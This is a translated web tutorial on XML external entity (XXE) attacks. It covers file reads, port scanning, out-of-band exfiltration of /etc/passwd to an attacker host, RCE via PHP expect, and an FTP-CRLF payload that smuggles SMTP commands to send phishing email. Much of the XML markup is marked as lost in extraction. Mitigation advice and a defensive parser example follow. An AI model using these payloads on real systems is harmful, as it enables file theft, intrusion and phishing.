
What is the method from XML to remote code execution

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

In this article the editor introduces in detail "what is the method from XML to remote code execution". The content is detailed, the steps are clear, and the details are handled properly. I hope this article helps resolve your doubts.

What is XXE?

Simply put, XXE is XML external entity injection. When a parser is allowed to resolve external entities, malicious XML can lead to arbitrary file reads, system command execution, internal port probing, attacks on intranet websites and other harm.

For example, if your application is written in PHP, you can call libxml_disable_entity_loader(TRUE) to stop libxml from loading external entities as a defensive measure. Note that this function is deprecated as of PHP 8.0, because libxml 2.9.0 and later disable external entity loading by default.

Basic exploitation

Usually the attacker injects a payload into the XML document. Once the document is parsed, it can read local files on the server and send requests into the internal network to scan internal ports. In other words, XXE is a way to reach services that are only accessible locally. To some extent, this may also help an attacker bypass firewall rules or authentication checks.

The following is an example of a simple POST request carrying an XML document:

POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies
Connection: close
Upgrade-Insecure-Requests: 1

John, Doe I love XML Computers 9.99 2018-10-01 XML is the best!

[The XML markup of the request body was lost in extraction; only its text content survives.]

The server's XML processor then parses the request above. The document is interpreted and the application returns: {"Request Successful": "Added!"}

Now, what happens when an attacker tries to abuse the XML parsing? Let's edit the document and include a malicious payload:

John, Doe I love XML Computers 9.99 2018-10-01 &xxe;

[The DOCTYPE declaring the xxe entity and the element markup were lost in extraction.]

The code is interpreted and returns:

{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
..."

Blind OOB XXE

As the example above shows, the server returns the contents of /etc/passwd in its response to our XXE payload. In some cases, however, nothing is returned to the attacker's browser or proxy even though an XXE vulnerability exists on the server. In that case we can use a Blind XXE to build an out-of-band (OOB) data channel and read the data that way. Although we cannot view the file contents directly, we can still use the vulnerable server as a proxy for scanning and code execution.

Scenario 1 - Port scan

In the first example, we pointed the entity at the /etc/passwd file through a file URI and got its contents back. Alternatively, we can use an http URI and force the server to send GET requests to endpoints and ports we specify, turning the XXE into SSRF (server-side request forgery).

The following document attempts to connect to port 8080; based on the response time or length, the attacker can determine whether the port is open.

John, Doe I love XML Computers 9.99 2018-10-01 &xxe;

[The DOCTYPE declaring the xxe entity and the element markup were lost in extraction.]

Scenario 2 - Stealing files through a DTD

External document type definition (DTD) files can be used to trigger OOB XXE. The attacker hosts a .dtd file on a VPS, so that the vulnerable server fetches the file and processes the malicious entity declarations it contains.

The following request is sent to the application to demonstrate and test the method:

John, Doe I love XML Computers 9.99 2018-10-01 &xxe;

[The DOCTYPE referencing the external DTD and the element markup were lost in extraction.]

Once the document above is processed by a vulnerable server, it sends a request to our remote server to fetch the DTD file that contains our payload:

%all;

[The entity declarations of the DTD file were lost in extraction; only the final parameter-entity reference survives.]

Let's take a moment to understand how the request above is processed. The result is that two requests reach our server, and the second one carries the contents of the /etc/passwd file.

In our VPS log we can see the second request carrying the file contents, which confirms the OOB XXE vulnerability:

http://ATTACKERSERVER.com/?daemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fbin%2Fsh%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fbin%2Fsh

Scenario 3 - Remote code execution

This rarely happens, but in some cases attackers can execute code through XXE, mainly because of misconfigured or poorly developed internal applications. If we are lucky enough that the PHP expect module is loaded on the vulnerable system, or on an internal application that processes XML, we can run a command such as the following:

]> John, Doe I love XML Computers 9.99 2018-10-01 &xxe;

[The DOCTYPE declaring the entity was lost in extraction; only its closing ]> and the text content survive.]

Response:

{"error": "no results for description uid=0 (root) gid=0 (root) groups=0 (root)..."

Scenario 4 - Phishing

We found a vulnerable endpoint that used Java's XML parser. After scanning internal ports, we found an SMTP service listening on port 25. Java supports ftp URIs through sun.net.ftp.impl.FtpClient, so we can specify a user name and password, for example ftp://user:password@host:port/test.txt, and the FTP client will send the corresponding USER command on the connection.

But if we put %0D%0A (CRLF) anywhere in the user part of the URL, we terminate the USER command and inject new commands into the FTP session, which lets us send arbitrary SMTP commands to port 25:

ftp://a%0D%0AEHLO%20a%0D%0AMAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0ADATA%0D%0AFrom%3A%20support%40VULNERABLESYSTEM.com%0ATo%3A%20victim%40gmail.com%0ASubject%3A%20test%0A%0Atest!%0A%0D%0A.%0D%0AQUIT%0D%0A:a@VULNERABLESYSTEM.com:25

When the FTP client connects using this URL, the following commands are sent to the mail server on VULNERABLESYSTEM.com:

ftp://a
EHLO a
MAIL FROM: <support@VULNERABLESYSTEM.com>
RCPT TO: <victim@gmail.com>
DATA
From: support@VULNERABLESYSTEM.com
To: victim@gmail.com
Subject: Reset your password

We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com
.
QUIT
:support@VULNERABLESYSTEM.com:25

This means an attacker can send phishing messages (for example, account reset links) from a trusted source and bypass spam filters. Besides links, attachments can be sent as well.

Useful tools

Being able to edit web requests by hand is critical for XXE testing, and I recommend Burp Suite here. Burp's scanner can detect potential XXE vulnerabilities for us, and its Intruder feature is well suited to port probing. Keep in mind that tools are only an aid; manual testing may work better in some cases!

HTTP request analysis tools like RequestBin and HookBin are well suited to OOB XXE testing. Burp Suite Pro's Collaborator is also a good choice, although some security researchers prefer their own VPS.

Mitigation measures

The root problem in everything discussed above is that the XML parser processes untrusted data sent by the user. It is difficult, and in practice impossible, to validate data referenced by a SYSTEM identifier in a DTD (document type definition), and most XML parsers are vulnerable to XXE by default. The best solution is therefore to configure the XML processor to use a local static DTD and to disallow any DTD declared in the XML itself.
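A defensive counterpart to that advice, added here as an example and not code from the article: Python's standard-library SAX parser configured to refuse any client-supplied DTD at the parser level, with a textual pre-check as a second layer and external entity resolution switched off. The element names in the sample bodies are constructed for the demo.

```python
import re
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler

DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)")  # any DTD is client-written: refuse it

class RejectDTD:  # lexical handler: aborts the parse the moment a DOCTYPE appears
    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DTD rejected: root={name} system_id={system_id}")
    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass

class FieldCollector(ContentHandler):  # gathers each element's text by element name
    def __init__(self):
        super().__init__()
        self.fields, self._path = {}, []
    def startElement(self, name, attrs):
        self._path.append(name)
    def characters(self, content):
        if self._path and content.strip():
            self.fields[self._path[-1]] = self.fields.get(self._path[-1], "") + content
    def endElement(self, name):
        self._path.pop()

def parse_untrusted(body: str, pre_gate: bool = True) -> dict:
    """Parse client XML with every external-entity path closed off."""
    if pre_gate and DTD_MARKER.search(body):  # cheap textual check before parsing
        raise ValueError("request body declares its own DTD")
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)  # no external general entities
    parser.setFeature(handler.feature_external_pes, False)  # no external parameter entities
    parser.setProperty(handler.property_lexical_handler, RejectDTD())  # parser-level gate
    collector = FieldCollector()
    parser.setContentHandler(collector)
    parser.feed(body)
    parser.close()
    return collector.fields

def is_blocked(body: str, pre_gate: bool = True) -> bool:
    try:  # True when the body is refused, which is the safe outcome for an XXE payload
        parse_untrusted(body, pre_gate)
    except ValueError:
        return True
    return False

BENIGN = "<order><name>John, Doe</name><description>I love XML</description></order>"  # constructed
XXE = ('<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'  # constructed XXE variant
       "<order><name>John, Doe</name><description>&xxe;</description></order>")
```

The same controls exist for the parsers the article mentions: PHP's libxml refuses to load external entities by default from libxml 2.9 onward, and Java's DocumentBuilderFactory can be given the http://apache.org/xml/features/disallow-doctype-decl feature to reject any DOCTYPE outright.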

That concludes this article on "what is the method from XML to remote code execution". To master this material you still need to practice with it. For more articles, you are welcome to follow the industry information channel.
